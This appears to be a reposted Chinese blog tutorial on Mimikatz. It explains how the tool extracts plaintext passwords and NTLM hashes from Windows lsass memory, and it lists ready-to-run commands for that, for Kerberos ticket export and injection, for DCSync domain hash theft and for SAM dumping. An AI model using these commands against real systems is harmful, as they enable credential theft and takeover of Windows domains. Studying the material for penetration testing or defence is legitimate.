Mimikatz簡介
Mimikatz 是一款功能強大的輕量級除錯神器,通過它你可以提升行程權限注入行程讀取行程記憶體,當然他最大的亮點就是他可以直接從 lsass.exe行程中獲取當前登錄系統用戶名的密碼, lsass是微軟Windows系統的安全機制它主要用于本地安全和登陸策略,通常我們在登陸系統時輸入密碼之后,密碼便會儲存在 lsass記憶體中,經過其 wdigest 和 tspkg 兩個模塊呼叫后,對其使用可逆的演算法進行加密并存盤在記憶體之中, 而 mimikatz 正是通過對lsass逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當前登陸系統!
Mimikatz命令使用
cls:清屏
standard:標準模塊,基本命令
crypto:加密相關模塊
sekurlsa:與證書相關的模塊
kerberos:kerberos模塊
privilege:提權相關模塊
process:行程相關模塊
serivce:服務相關模塊
lsadump:LsaDump模塊
ts:終端服務器模塊
event:事件模塊
misc:雜項模塊
token:令牌操作模塊
vault:Windows 、證書模塊
minesweeper:Mine Sweeper模塊
dpapi:DPAPI模塊(通過API或RAW訪問)[資料保護應用程式編程介面]
busylight:BusyLight Module
sysenv:系統環境值模塊
sid:安全識別符號模塊
iis:IIS XML配置模塊
rpc:mimikatz的RPC控制
sr98:用于SR98設備和T5577目標的RF模塊
rdm:RDM(830AL)器件的射頻模塊
acr:ACR模塊
version:查看版本
exit:退出
Mimikatz常用命令
cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看當前登錄的系統用戶 system::computer-------查看計算機名稱 process::list------------------列出行程 process::suspend 行程名稱 -----暫停行程 process::stop 行程名稱---------結束行程 process::modules --列出系統的核心模塊及所在位置 service::list---------------列出系統的服務 service::remove-----------移除系統的服務 service::start stop 服務名稱--啟動或停止服務 privilege::list---------------列出權限串列 privilege::enable--------激活一個或多個權限 privilege::debug-----------------提升權限 nogpo::cmd------------打開系統的cmd.exe nogpo::regedit -----------打開系統的注冊表 nogpo::taskmgr-------------打開任務管理器 ts::sessions-----------------顯示當前的會話 ts::processes------顯示行程和對應的pid情況等 sekurlsa::wdigest-----獲取本地用戶資訊及密碼 sekurlsa::tspkg------獲取tspkg用戶資訊及密碼 sekurlsa::logonPasswords--獲登陸用戶資訊及密碼
Mimikatz使用前準備
mimikatz # log
mimikatz # privilege::debug //提升權限(不是administrator,debug會失敗)

Mimikatz抓取明文密碼
mimikatz #log
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords
注:但是在安裝了KB2871997補丁或者系統版本大于windows server 2012時,系統的記憶體中就不再保存明文的密碼,這樣利用mimikatz就不能從記憶體中讀出明文密碼了,mimikatz的使用需要administrator用戶執行,administrators中的其他用戶都不行,所以我們這里用administrator權限啟動mimikatz,

msv:是賬戶對于的密碼的各種加密協議的密文,這里有LM、NTLM和SHA1加密的密文
tspkg,wdigest,kerberos:是賬戶的明文密碼了,(這里顯示為null,是應為版本大于2012)
SSP:是最新登陸到其他RDP終端的賬戶和密碼
Mimikatz模塊使用
sekurlsa模塊
sekurlsa::logonpasswords //獲取登錄用戶資訊及密碼
抓取用戶NTLM哈希
sekurlsa::msv
加載dmp檔案,并匯出其中的明文密碼
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
匯出lsass.exe行程中所有的票據
sekurlsa::tickets /export
kerberos模塊
列出系統中的票據
kerberos::list
kerberos::tgt
清除系統中的票據
kerberos::purge
匯入票據到系統中
kerberos::ptc 票據路徑
lsadump模塊
在域控上執行)查看域kevin.com內指定用戶root的詳細資訊,包括NTLM哈希等 lsadump::dcsync /domain:kevin.com /user:root (在域控上執行)讀取所有域用戶的哈希 lsadump::lsa /patch 從sam.hive和system.hive檔案中獲得NTLM Hash lsadump::sam /sam:sam.hive /system:system.hive 從本地SAM檔案中讀取密碼哈希 token::elevate lsadump::sam
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/296063.html
標籤:其他
上一篇:【個人筆記】暴力破解 Brute force(暴力破解攻擊、不安全的驗證碼問題、暴力破解防御、token防御暴力破解無意義)
